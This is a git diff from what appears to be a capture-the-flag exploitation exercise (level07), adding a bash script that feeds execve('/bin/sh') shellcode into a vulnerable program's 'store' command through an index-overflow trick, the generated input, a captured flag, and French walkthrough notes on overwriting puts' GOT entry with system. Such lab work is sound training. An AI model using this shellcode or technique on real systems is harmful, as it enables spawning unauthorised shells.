diff --git a/level07/Ressources/script.sh b/level07/Ressources/script.sh new file mode 100755 index 0000000..603ec5e --- /dev/null +++ b/level07/Ressources/script.sh @@ -0,0 +1,45 @@ +#!/bin/bash + + +# shellcode is : +# \x31\xc0\xb0\x46 +# \x31\xdb\x31\xc9 +# \xcd\x80\xeb\x16 +# \x5b\x31\xc0\x88 +# \x43\x07\x89\x5b +# \x08\x89\x43\x0c +# \xb0\x0b\x8d\x4b +# \x08\x8d\x53\x0c +# \xcd\x80\xe8\xe5 +# \xff\xff\xff\x2f +# \x62\x69\x6e\x2f +# \x73\x68 + +IFS='' + +shellcode=(0x46b0c031 0xc931db31 0x16eb80cd 0x88c0315b 0x5b890743 0x0c438908 0x4b8d0bb0 0x0c538d08 0xe5e880cd 0x2fffffff 0x2f6e6962 0x00006873) + +bit_mask=2147483691 + +init_addr=43 + +for ((i = 0; i < ${#shellcode[@]}; i++)); do + echo "store" + echo "$(( ${shellcode[$i]} ))" + if (( (i + init_addr) % 3 == 0)); then + echo "$(( i + bit_mask ))" + else + echo "$((i + init_addr))" + fi +done + +echo "store" +echo "$(( 0xffffd600 ))" +echo "$(( -1040108880 ))" +echo "read" + +#for i in $(seq 0 11); do +# echo "store" +# echo "${shellcode[$i]}" +# echo $(($i + $bit_mask)) +#done diff --git a/level07/Ressources/test.txt b/level07/Ressources/test.txt new file mode 100644 index 0000000..51fd68e --- /dev/null +++ b/level07/Ressources/test.txt @@ -0,0 +1,42 @@ +store +1185988657 +43 +store +3375487793 +44 +store +384532685 +2147483693 +store +2294296923 +46 +store +1535706947 +47 +store +205752584 +2147483696 +store +1267534768 +49 +store +206802184 +50 +store +3857219789 +2147483699 +store +805306367 +52 +store +795765090 +53 +store +26739 +2147483702 +store +4294956544 (-16 pour le vrai 28 au lieu de 44) +-1040108880 +store +42 +42 diff --git a/level07/flag b/level07/flag new file mode 100644 index 0000000..73271cc --- /dev/null +++ b/level07/flag @@ -0,0 +1 @@ +7WJ6jFBzrcjEYXudxnM3kdW7n3qyxR6tk2xGrkSC diff --git a/level07/walkthrough b/level07/walkthrough new file mode 100644 index 0000000..d2481d0 --- /dev/null +++ b/level07/walkthrough @@ -0,0 +1,15 @@ +-1040108880On peut ecrire que 8 octets sur 12 + +"/bin/sh" c'est 8 char avec le '\0' donc ok pour le modulo +"/bin" => 0x2F62696E => 794978670 +"/sh\0" => 0x2F736800 => 796092416 + + +system on peut le call avec l'addresse, puis l'argument vers esp+quelque chose. + +-1040108880 Index a store avec 4159090384 (0xf7e6aed0 ou system) +ca override le plt/got de puts + + + +override esp pour avoir le bon argument format addr de system BLANC (modulo 3) addr de /bin/sh diff --git a/level08/Ressources/level08 b/level08/Ressources/level08 new file mode 100755 index 0000000..49adcdb Binary files /dev/null and b/level08/Ressources/level08 differ